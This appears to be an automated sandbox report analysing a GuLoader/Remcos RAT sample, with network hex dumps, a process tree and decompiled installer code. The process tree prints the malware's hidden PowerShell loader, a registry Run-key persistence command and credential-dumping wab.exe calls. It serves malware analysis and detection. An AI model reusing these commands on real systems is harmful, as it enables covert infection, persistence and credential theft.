                                                2024-05-02 06:04:25 UTC1369INData Raw: 3e 89 3e 13 04 ee 29 f5 f0 f5 c3 37 e2 79 8a 7c a2 91 4f 5e 0a 6e 66 65 ee e1 e4 87 f9 d1 2e 94 01 1d 06 06 b5 3c d5 5f 11 26 41 de 68 9c a4 ee 10 ed ce fe 36 da 9c 62 10 d3 84 e3 86 fe f3 88 43 26 b1 0a bb a0 ba 53 af 64 33 d2 7d aa 8f ff 47 f5 5f f2 75 4b 57 a6 7b 9f 21 30 9f 41 44 c5 2c 67 4a 8b 16 c6 30 43 be 7d 20 9e 48 99 b9 5f 28 a2 98 2b 75 90 ec 6c 84 82 16 bc 61 d7 62 c9 7a 2c e1 46 1d 9e d0 ba 27 02 8c a1 90 3a c8 e6 6d 6e 75 62 95 30 95 31 17 e2 84 9d 71 86 f7 7b f9 5c 21 80 0a fd 66 7c a6 c8 c6 d0 95 3d 1a 41 fd bd d7 e4 b9 4a 0d dd bb ac 52 6b f6 1d 0b 40 ba ba 34 39 cf 85 50 df 19 2a 67 70 8e 4c 06 1a f4 26 4e 27 7e 1d 67 a0 fa 76 e7 3e f0 aa ab 91 bc dd 5e e2 4c f2 be 5c 26 1b c3 e5 33 76 e5 7b 56 d6 22 57 72 71 60 36 4b ab 23 2d 32 42 48
                                                Data Ascii: >>)7y|O^nfe.<_&Ah6bC&Sd3}G_uKW{!0AD,gJ0C} H_(+ulabz,F':mnub01q{\!f|=AJRk@49P*gpL&N'~gv>^L\&3v{V"Wrq`6K#-2BH
                                                2024-05-02 06:04:25 UTC1369INData Raw: 4a 10 bc f9 f0 0b 6a 34 0f 49 80 b7 73 0d f6 ff 6f 1f 74 96 e5 3d 3c 39 15 fb 3e 72 15 21 bd 1e 74 d2 e6 63 6f 72 a8 cf 97 1a e4 3e ed 1b 63 09 2a fa 0b e6 03 a4 c9 db 43 c1 ea e3 52 5a 80 bf 48 31 da bd 8e 21 bc ce 6e 6b f1 8d b8 51 36 8a 53 e2 1e 91 14 f7 be 6e b6 bf 67 8b a0 7c f4 d6 8f 9c 4e d2 ec 66 4d c1 83 84 51 45 12 0e 31 da 34 da e4 f4 28 3c 47 ff 25 ae f4 27 54 d3 92 73 7b d1 29 c6 cd ed 40 9f 87 98 e4 15 9d 46 2c e7 f6 d6 a8 d4 29 33 81 bc 85 35 64 4b 1a 31 2d 60 09 61 db 24 40 aa c6 cf 1b 30 12 4b 42 d2 ed 01 56 87 09 f4 f1 38 db 28 74 9c 69 9b 1b 4e 4e 68 2e 09 13 6c bf ec 99 ac c9 d4 b6 b3 ba 86 a0 32 45 c3 68 1a 99 6d bc 0b 48 f0 41 d0 99 87 d1 8e cf d0 f9 4c 96 69 66 67 b1 db 4a 41 9a 76 a4 39 51 55 d5 c6 32 f0 a3 b4 3c 3f 2b b0 bf 5a e7
                                                Data Ascii: Jj4Isot=<9>r!tcor>c*CRZH1!nkQ6Sng|NfMQE14(<G%'Ts{)@F,)35dK1-`a$@0KBV8(tiNNh.l2EhmHALifgJAv9QU2<?+Z
                                                2024-05-02 06:04:25 UTC1369INData Raw: 47 34 5f 8e 2a 71 0b 38 cf 84 85 05 73 c4 c7 d8 c5 09 23 d5 be 42 06 c8 46 ca 27 8d e4 2c b3 cc c2 b4 6d 89 e1 a3 94 44 3f 6f 15 b5 56 cb 76 4b d1 65 69 c0 f6 b8 b3 df af 64 de 6a 32 84 06 47 1c ce 35 c8 4a 3d b8 b6 32 6e 70 79 7e ba 2f ec fb 4c f5 1b 9f 43 03 c7 75 4f 2d e7 36 57 78 28 ed 06 cb 36 dc e9 95 29 2e af eb 4d ee 57 cb ad 75 b7 36 d4 cb 99 28 6b 1c d0 d1 e5 d7 cc 7e 3a 8f 3a fb f8 58 90 2c 2e 11 59 40 3c a1 6f 5a d7 20 70 e2 c3 ff d3 7e ea ca 7f a6 08 b0 3b 5c 0c 12 8f 5b f2 89 4b 30 a2 90 79 52 62 ce 10 33 6e 1f 9a 86 32 52 85 e2 81 27 b8 77 8a 7f 10 ef ae b6 51 50 f9 55 d1 6d d9 4e 60 19 a0 bc 17 93 5f 17 ca 77 60 87 ff 8a e4 63 ae 4f 64 f8 92 d6 b0 35 73 7b cb bc 19 d0 2f db db dc 71 97 3d 64 e4 bd 82 f2 16 7b 46 e5 42 9b 10 bd ae c4 75 6f
                                                Data Ascii: G4_*q8s#BF',mD?oVvKeidj2G5J=2npy~/LCuO-6Wx(6).MWu6(k~::X,.Y@<oZ p~;\[K0yRb3n2R'wQPUmN`_w`cOd5s{/q=d{FBuo
                                                2024-05-02 06:04:25 UTC1369INData Raw: 6b 01 3f 0d 9d d4 54 84 19 82 a1 85 90 e6 86 96 d1 aa 10 18 08 4b 21 d6 91 fd 85 24 88 0d 32 ff 53 c5 f5 e0 8f db 96 7f b4 c1 38 45 d2 93 45 d0 e1 3a 77 4d 40 dc 4a b2 d2 db 9e 0a 71 ff ff 23 0f 08 ee f6 8d 3d e6 03 e8 95 a8 ed 0a 3e 87 98 41 3e db 6d fb 64 13 7a c4 1e 02 d7 0c e8 21 66 64 27 87 6f d1 4d 2b 26 1d 9d c1 c7 52 04 09 3c 9d 64 c8 10 5b c2 6f 75 49 62 bb 08 5e f5 7b 36 f1 ab e1 f9 ce dd 3d c2 3f 01 1d 06 58 3e d9 88 9d 05 26 17 55 99 74 29 ed 10 ed 45 aa 12 d2 a7 a0 66 ef 7b 48 16 40 f1 88 43 38 0a 17 e5 a3 a2 d8 6e a6 45 d7 95 66 89 ff 47 39 b6 23 77 4b 57 1e bc e2 64 30 77 ed 1f c0 4c 18 6b b9 20 3b 34 b3 00 93 14 d8 48 12 e7 b2 b4 a0 e2 2a 24 78 6c 6b 84 82 92 7c 15 f5 e1 ac 86 2c b0 cd d3 36 51 b8 67 2c 63 c8 0c 32 d9 e6 6d 73 a3 ac 7d 59
                                                Data Ascii: k?TK!$2S8EE:wM@Jq#=>A>mdz!fd'oM+&R<d[ouIb^{6=?X>&Ut)Ef{H@C8nEfG9#wKWd0wLk ;4H*$xlk|,6Qg,c2ms}Y
                                                2024-05-02 06:04:25 UTC1369INData Raw: 23 7e 5d ec e4 1e 50 de 9a 9d ce 8b c4 ea ba d7 9e 68 e6 b5 82 ad d4 2f a1 37 76 e5 f7 be 5d ed d4 0f 71 68 45 68 43 c4 d3 cd fd c3 ff 54 32 b3 09 3d 68 ac 60 0e 9c 53 4d f8 14 10 ff e4 16 31 a9 73 e4 71 cc e5 b8 16 b5 fa b4 36 06 2f b0 ec 95 c9 b0 85 2b 07 86 90 03 a3 24 8c f4 d6 6a 20 78 84 99 30 da 55 28 56 f8 61 c6 01 ad b7 88 a4 6f 88 86 68 45 14 72 4c 74 4c af b0 7d 74 9a 00 7f 7e b9 f2 b9 74 af 58 ca 77 ba 45 68 7f 72 cb 25 c9 19 8e 67 a7 b2 f3 d7 93 05 1c 31 50 f9 92 71 ea 41 2f 9f 9e 51 b4 ea c3 99 6d 85 dd 70 e9 99 29 6b 92 dd 08 6a 26 90 a0 37 d0 5f 14 59 70 92 49 65 d8 c5 b4 c5 e7 6b 43 d9 a6 2b 9b 42 5d df 57 fb 60 61 ee 81 ea 55 38 83 27 14 60 3f e8 fc 3f 13 06 a4 90 b7 d2 f0 b5 1f 81 5f 01 9a 64 d2 ac 83 76 d1 63 cd 8e 0f 30 e5 fe 93 74 80
                                                Data Ascii: #~]Ph/7v]qhEhCT2=h`SM1sq6/+$j x0U(VaohErLtL}t~tXwEhr%g1PqA/Qmp)kj&7_YpIekC+B]W`aU8'`??_dvc0t
                                                2024-05-02 06:04:25 UTC1369INData Raw: 84 e2 f1 eb 1a c3 e9 85 0e 61 78 46 f6 4f ae bd 80 f6 28 61 39 2a 1c 22 fa 9c d8 a4 55 11 9d 5f ae 81 bb 95 26 91 e2 52 4c aa 2a f6 44 a4 6d e7 0c e5 b6 08 7c ef ff b8 d9 2c e8 22 c4 e6 36 8a c6 a8 00 7a e6 a3 1c 30 b7 93 29 f4 c8 d0 3e e1 d2 12 8c c1 b1 30 98 bf ba 52 b9 2b d2 7f 62 66 b0 19 6b f2 c4 db 08 8b 37 bb 30 5f 05 a9 a4 ff 5f 03 4b ed 95 32 47 78 ec 6b 9d 9b ec b5 b0 11 43 89 22 6b 5b a5 03 53 44 3d d2 d3 27 53 a3 94 c7 e9 8d fe 8e 72 24 2f 4a d4 b5 1c 1f 6d e7 16 10 47 1f 17 ea 88 0f 21 78 32 f6 c5 9e 5e 13 0c f6 30 86 ba 0e cd 61 d4 08 6c b2 80 11 42 8d c0 02 db 4c 2d e7 bc 25 5d 26 78 c6 dd 77 3c e8 72 e0 a7 51 14 81 3b e1 a3 d6 64 5f 87 59 3a ed 6c f6 25 68 9c 1a d5 b8 a3 f8 59 80 fb 8e 1d 54 af 75 ef 1f e7 72 20 3f 5a 5f c9 8f 1d ca 18 6d
                                                Data Ascii: axFO(a9*"U_&RL*Dm|,"6z0)>0R+bfk70__K2GxkC"k[SD='Sr$/JmG!x2^0alBL-%]&xw<rQ;d_Y:l%hYTur ?Z_m
                                                2024-05-02 06:04:25 UTC1369INData Raw: d1 e4 c4 f2 97 b8 58 4f 0e f8 92 aa c6 36 73 ee 11 93 a0 78 e3 46 2f 23 8e f4 53 99 a9 bd db 79 f5 24 48 fa e4 fe 73 57 a1 82 e6 6f 24 64 13 04 a7 07 a5 05 8b 23 8e 17 db ed e1 8e fb b6 2a b8 d8 95 d0 94 77 c7 a7 34 51 30 ef b6 ab 21 1e 25 7a 33 b6 f0 15 24 b1 bd 55 76 34 39 c4 d5 0c 48 4d 05 fe 12 aa 33 50 ce 51 4c 01 d7 3d cd 3c 4c 09 55 a6 d0 af 62 e7 6f bd 5c e6 34 b0 4a f8 8a dc 52 c8 41 2a cb e4 96 37 d8 13 96 d8 57 20 80 39 94 97 c7 1a 13 d3 00 2f 6a 0b 3f 31 e5 3b 0c 31 1c 58 92 20 ec fe 95 22 0f 29 b2 0a 83 76 0e 6f cb 40 10 6e 98 cd 70 5c 6b c1 24 31 88 31 97 f9 3f 21 62 14 73 f9 aa 1f 7b e4 97 e4 b9 3d 97 94 e2 c1 d6 26 9e f4 1e ea 00 0f 72 9b 4d c6 2d a1 8c 29 5e a7 e8 ff 91 99 5e 28 97 5c 09 36 c5 5f 61 fe e2 8d c9 3e cc 3d fd e4 d9 be 55 a3
                                                Data Ascii: XO6sxF/#Sy$HsWo$d#*w4Q0!%z3$Uv49HM3PQL=<LUbo\4JRA*7W 9/j?1;1X ")vo@np\k$11?!bs{=&rM-)^^(\6_a>=U
                                                2024-05-02 06:04:25 UTC1369INData Raw: 09 12 05 95 c1 3b 28 a2 e2 7a f8 d5 66 e2 4a d2 fe cd 90 28 9d 99 f7 61 e9 ae 51 de d0 ba 37 a7 26 28 3c 58 c8 e6 e6 ec 76 e9 70 6d 47 26 17 88 75 f7 71 79 73 59 e9 0d c9 5d 0e fd 66 be ae c8 2f e5 79 82 e5 ca 79 b7 a7 03 c3 71 05 d2 2f 65 90 6f f6 96 7a cc f6 9e 32 12 ce 54 56 1b 1d 2a 8e 9e 71 b3 f9 f3 72 23 4e 27 f5 5c ec ec 1e 5c ab 59 5b ca d8 78 4c 12 a3 1d 1a a5 b5 27 02 0f 4c 14 64 9e 0b 8f a9 29 a9 99 f6 b1 14 15 b4 df 07 35 da 5f a6 08 ea 48 c0 4d 1b 5c ae c8 a7 33 ac a2 0c 36 99 24 07 ae 5e fb 81 1b 67 bd 21 b4 fd ce 99 25 ef e9 85 68 f4 8b f6 19 92 17 8e 5d 77 d8 85 7d 69 30 23 cc 8f 78 81 fa 69 cc 9f 39 22 cf 02 c5 28 8d 3c c6 0b 2b 27 51 77 0e 61 8d 38 2f ac f7 7b 5f ea e2 43 80 f5 af 52 36 d9 ab 9b dd fd fe 61 c3 11 99 33 c1 f3 92 2a 8f dc
                                                Data Ascii: ;(zfJ(aQ7&(<XvpmG&uqysY]f/yyq/eoz2TV*qr#N'\\Y[xL'Ld)5_HM\36$^g!%h]w}i0#xi9"(<+'Qwa8/{_CR6a3*
                                                2024-05-02 06:04:25 UTC1369INData Raw: 9f 45 fa d1 57 54 18 b9 a2 b2 44 10 6a ff 98 67 37 cf 17 4b a6 0c ba 11 b5 63 75 aa 64 da cf bf 74 1e 74 d6 af 18 b0 b6 75 5d c1 53 55 70 7a 36 cb ce 72 14 f0 77 5a d1 1c 28 4e 52 d8 eb be 15 6b 87 8c d2 a7 db a9 78 ec 27 4a f8 00 cf a5 76 e1 55 41 4e a7 60 25 a7 ec 7b ad 77 af 71 5e c2 dd ef 31 22 fa 1d ae 8f d8 26 df f6 28 c7 86 48 85 e1 71 78 46 2d a7 9d 24 5b 01 d9 a1 6b 63 d6 77 99 16 c0 5b ae 4c c2 18 00 93 be 11 36 79 b4 b5 a7 d5 09 8a c7 4c e2 e6 9c 3b e4 90 d6 7a 7b 40 53 ca 5c 23 f0 be ac 7b 78 dc 34 19 d1 52 6e cb 74 08 4a ac fc 47 38 47 74 fa a6 05 b0 04 6b 94 c0 be dd c2 c6 82 db eb e3 56 6b ba c2 64 fb ae 20 b8 b7 9b 09 7f 12 d7 53 d9 d5 85 d8 1c 3b 80 32 c3 35 37 5e 7c 2b 0f 27 b9 35 d2 d6 7e d4 53 c7 e6 c6 d3 27 35 4e 6b 38 fd cb 5a d2 dd
                                                Data Ascii: EWTDjg7Kcudttu]SUpz6rwZ(NRkx'JvUAN`%{wq^1"&(HqxF-$[kcw[L6yL;z{@S\#{x4RntJG8GtkVkd S;257^|+'5~S'5Nk8Z


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:08:02:51
                                                Start date:02/05/2024
                                                Path:C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"
                                                Imagebase:0x400000
                                                File size:802'713 bytes
                                                MD5 hash:6775321BBBE02737DAFF72CBFEF1D3A5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:08:02:57
                                                Start date:02/05/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)"
                                                Imagebase:0x8d0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2984184609.0000000009CB6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:08:02:57
                                                Start date:02/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:08:02:59
                                                Start date:02/05/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                Imagebase:0x790000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:08:04:10
                                                Start date:02/05/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x4b0000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:8
                                                Start time:08:04:23
                                                Start date:02/05/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"
                                                Imagebase:0x790000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:08:04:23
                                                Start date:02/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:08:04:23
                                                Start date:02/05/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"
                                                Imagebase:0xc00000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:11
                                                Start time:08:04:38
                                                Start date:02/05/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gyjlretajhvbzkpgzfenpklwvjfw"
                                                Imagebase:0x4b0000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:12
                                                Start time:08:04:38
                                                Start date:02/05/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qbovkwdcxqngjydkiqrgaxffwqwfffq"
                                                Imagebase:0x4b0000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:13
                                                Start time:08:04:38
                                                Start date:02/05/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bvuokpowlyflmeroabeidcawfegogqpwfc"
                                                Imagebase:0x4b0000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:22.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:23.6%
                                                  Total number of Nodes:1277
                                                  Total number of Limit Nodes:33
                                                  execution_graph 3823 4027c1 3824 402a1d 18 API calls 3823->3824 3825 4027c7 3824->3825 3826 402802 3825->3826 3827 4027eb 3825->3827 3836 4026a6 3825->3836 3828 402818 3826->3828 3829 40280c 3826->3829 3831 4027f0 3827->3831 3832 4027ff 3827->3832 3830 405d1f 18 API calls 3828->3830 3833 402a1d 18 API calls 3829->3833 3830->3832 3837 405cfd lstrcpynA 3831->3837 3832->3836 3838 405c5b wsprintfA 3832->3838 3833->3832 3837->3836 3838->3836 3839 401cc2 3840 402a1d 18 API calls 3839->3840 3841 401cd2 SetWindowLongA 3840->3841 3842 4028cf 3841->3842 3843 401a43 3844 402a1d 18 API calls 3843->3844 3845 401a49 3844->3845 3846 402a1d 18 API calls 3845->3846 3847 4019f3 3846->3847 3125 401e44 3126 402a3a 18 API calls 3125->3126 3127 401e4a 3126->3127 3128 404f16 25 API calls 3127->3128 3129 401e54 3128->3129 3141 40548e CreateProcessA 3129->3141 3131 401eb0 CloseHandle 3133 4026a6 3131->3133 3132 401e79 WaitForSingleObject 3134 401e5a 3132->3134 3135 401e87 GetExitCodeProcess 3132->3135 3134->3131 3134->3132 3134->3133 3144 4060ce 3134->3144 3136 401ea4 3135->3136 3137 401e99 3135->3137 3136->3131 3140 401ea2 3136->3140 3148 405c5b wsprintfA 3137->3148 3140->3131 3142 4054c1 CloseHandle 3141->3142 3143 4054cd 3141->3143 3142->3143 3143->3134 3145 4060eb PeekMessageA 3144->3145 3146 4060e1 DispatchMessageA 3145->3146 3147 4060fb 3145->3147 3146->3145 3147->3132 3148->3140 3848 402644 3849 40264a 3848->3849 3850 402652 FindClose 3849->3850 3851 4028cf 3849->3851 3850->3851 3852 406344 3853 4061c8 3852->3853 3854 406b33 3853->3854 3855 406252 GlobalAlloc 3853->3855 3856 406249 GlobalFree 3853->3856 3857 4062c0 GlobalFree 3853->3857 3858 4062c9 GlobalAlloc 3853->3858 3855->3853 3855->3854 3856->3855 3857->3858 3858->3853 3858->3854 3859 4026c6 3860 402a3a 18 API calls 3859->3860 3861 4026d4 3860->3861 3862 4026ea 3861->3862 3864 402a3a 18 API calls 3861->3864 3863 40594b 2 API calls 3862->3863 3865 4026f0 3863->3865 3864->3862 3887 405970 GetFileAttributesA CreateFileA 3865->3887 3867 4026fd 3868 4027a0 3867->3868 3869 402709 GlobalAlloc 3867->3869 3872 4027a8 DeleteFileA 3868->3872 3873 4027bb 3868->3873 3870 402722 3869->3870 3871 402797 CloseHandle 3869->3871 3888 403091 SetFilePointer 3870->3888 3871->3868 3872->3873 3875 402728 3876 40307b ReadFile 3875->3876 3877 402731 GlobalAlloc 3876->3877 3878 402741 3877->3878 3879 402775 3877->3879 3881 402e9f 36 API calls 3878->3881 3880 405a17 WriteFile 3879->3880 3882 402781 GlobalFree 3880->3882 3886 40274e 3881->3886 3883 402e9f 36 API calls 3882->3883 3885 402794 3883->3885 3884 40276c GlobalFree 3884->3879 3885->3871 3886->3884 3887->3867 3888->3875 3889 402847 3890 402a1d 18 API calls 3889->3890 3891 40284d 3890->3891 3892 40287e 3891->3892 3893 4026a6 3891->3893 3895 40285b 3891->3895 3892->3893 3894 405d1f 18 API calls 3892->3894 3894->3893 3895->3893 3897 405c5b wsprintfA 3895->3897 3897->3893 3898 4022c7 3899 402a3a 18 API calls 3898->3899 3900 4022d8 3899->3900 3901 402a3a 18 API calls 3900->3901 3902 4022e1 3901->3902 3903 402a3a 18 API calls 3902->3903 3904 4022eb GetPrivateProfileStringA 3903->3904 3347 401751 3348 402a3a 18 API calls 3347->3348 3349 401758 3348->3349 3350 401776 3349->3350 3351 40177e 3349->3351 3389 405cfd lstrcpynA 3350->3389 3390 405cfd lstrcpynA 3351->3390 3354 40177c 3358 405f68 5 API calls 3354->3358 3355 401789 3391 40576f lstrlenA CharPrevA 3355->3391 3365 40179b 3358->3365 3359 406001 2 API calls 3359->3365 3362 4017b2 CompareFileTime 3362->3365 3363 401876 3364 404f16 25 API calls 3363->3364 3366 401880 3364->3366 3365->3359 3365->3362 3365->3363 3368 405cfd lstrcpynA 3365->3368 3372 405d1f 18 API calls 3365->3372 3383 40184d 3365->3383 3385 40594b GetFileAttributesA 3365->3385 3388 405970 GetFileAttributesA CreateFileA 3365->3388 3394 4054f3 3365->3394 3369 402e9f 36 API calls 3366->3369 3367 404f16 25 API calls 3384 401862 3367->3384 3368->3365 3370 401893 3369->3370 3371 4018a7 SetFileTime 3370->3371 3373 4018b9 FindCloseChangeNotification 3370->3373 3371->3373 3372->3365 3374 4018ca 3373->3374 3373->3384 3375 4018e2 3374->3375 3376 4018cf 3374->3376 3378 405d1f 18 API calls 3375->3378 3377 405d1f 18 API calls 3376->3377 3380 4018d7 lstrcatA 3377->3380 3381 4018ea 3378->3381 3380->3381 3382 4054f3 MessageBoxIndirectA 3381->3382 3382->3384 3383->3367 3383->3384 3386 40596a 3385->3386 3387 40595d SetFileAttributesA 3385->3387 3386->3365 3387->3386 3388->3365 3389->3354 3390->3355 3392 40178f lstrcatA 3391->3392 3393 405789 lstrcatA 3391->3393 3392->3354 3393->3392 3395 405508 3394->3395 3396 405554 3395->3396 3397 40551c MessageBoxIndirectA 3395->3397 3396->3365 3397->3396 3915 401651 3916 402a3a 18 API calls 3915->3916 3917 401657 3916->3917 3918 406001 2 API calls 3917->3918 3919 40165d 3918->3919 3920 401951 3921 402a1d 18 API calls 3920->3921 3922 401958 3921->3922 3923 402a1d 18 API calls 3922->3923 3924 401962 3923->3924 3925 402a3a 18 API calls 3924->3925 3926 40196b 3925->3926 3927 40197e lstrlenA 3926->3927 3928 4019b9 3926->3928 3929 401988 3927->3929 3929->3928 3933 405cfd lstrcpynA 3929->3933 3931 4019a2 3931->3928 3932 4019af lstrlenA 3931->3932 3932->3928 3933->3931 3934 4019d2 3935 402a3a 18 API calls 3934->3935 3936 4019d9 3935->3936 3937 402a3a 18 API calls 3936->3937 3938 4019e2 3937->3938 3939 4019e9 lstrcmpiA 3938->3939 3940 4019fb lstrcmpA 3938->3940 3941 4019ef 3939->3941 3940->3941 3942 4021d2 3943 402a3a 18 API calls 3942->3943 3944 4021d8 3943->3944 3945 402a3a 18 API calls 3944->3945 3946 4021e1 3945->3946 3947 402a3a 18 API calls 3946->3947 3948 4021ea 3947->3948 3949 406001 2 API calls 3948->3949 3950 4021f3 3949->3950 3951 402204 lstrlenA lstrlenA 3950->3951 3952 4021f7 3950->3952 3954 404f16 25 API calls 3951->3954 3953 404f16 25 API calls 3952->3953 3956 4021ff 3952->3956 3953->3956 3955 402240 SHFileOperationA 3954->3955 3955->3952 3955->3956 3445 405054 3446 405076 GetDlgItem GetDlgItem GetDlgItem 3445->3446 3447 4051ff 3445->3447 3490 403f17 SendMessageA 3446->3490 3449 405207 GetDlgItem CreateThread FindCloseChangeNotification 3447->3449 3450 40522f 3447->3450 3449->3450 3493 404fe8 OleInitialize 3449->3493 3452 405245 ShowWindow ShowWindow 3450->3452 3453 40527e 3450->3453 3454 40525d 3450->3454 3451 4050e6 3456 4050ed GetClientRect GetSystemMetrics SendMessageA SendMessageA 3451->3456 3492 403f17 SendMessageA 3452->3492 3460 403f49 8 API calls 3453->3460 3455 4052b8 3454->3455 3458 405291 ShowWindow 3454->3458 3459 40526d 3454->3459 3455->3453 3463 4052c5 SendMessageA 3455->3463 3461 40515b 3456->3461 3462 40513f SendMessageA SendMessageA 3456->3462 3466 4052b1 3458->3466 3467 4052a3 3458->3467 3464 403ebb SendMessageA 3459->3464 3465 40528a 3460->3465 3470 405160 SendMessageA 3461->3470 3471 40516e 3461->3471 3462->3461 3463->3465 3472 4052de CreatePopupMenu 3463->3472 3464->3453 3469 403ebb SendMessageA 3466->3469 3468 404f16 25 API calls 3467->3468 3468->3466 3469->3455 3470->3471 3474 403ee2 19 API calls 3471->3474 3473 405d1f 18 API calls 3472->3473 3475 4052ee AppendMenuA 3473->3475 3476 40517e 3474->3476 3477 40530c GetWindowRect 3475->3477 3478 40531f TrackPopupMenu 3475->3478 3479 405187 ShowWindow 3476->3479 3480 4051bb GetDlgItem SendMessageA 3476->3480 3477->3478 3478->3465 3482 40533b 3478->3482 3483 4051aa 3479->3483 3484 40519d ShowWindow 3479->3484 3480->3465 3481 4051e2 SendMessageA SendMessageA 3480->3481 3481->3465 3485 40535a SendMessageA 3482->3485 3491 403f17 SendMessageA 3483->3491 3484->3483 3485->3485 3486 405377 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3485->3486 3488 405399 SendMessageA 3486->3488 3488->3488 3489 4053bb GlobalUnlock SetClipboardData CloseClipboard 3488->3489 3489->3465 3490->3451 3491->3480 3492->3454 3494 403f2e SendMessageA 3493->3494 3497 40500b 3494->3497 3495 405032 3496 403f2e SendMessageA 3495->3496 3498 405044 OleUninitialize 3496->3498 3497->3495 3499 401389 2 API calls 3497->3499 3499->3497 3957 402254 3958 40225b 3957->3958 3961 40226e 3957->3961 3959 405d1f 18 API calls 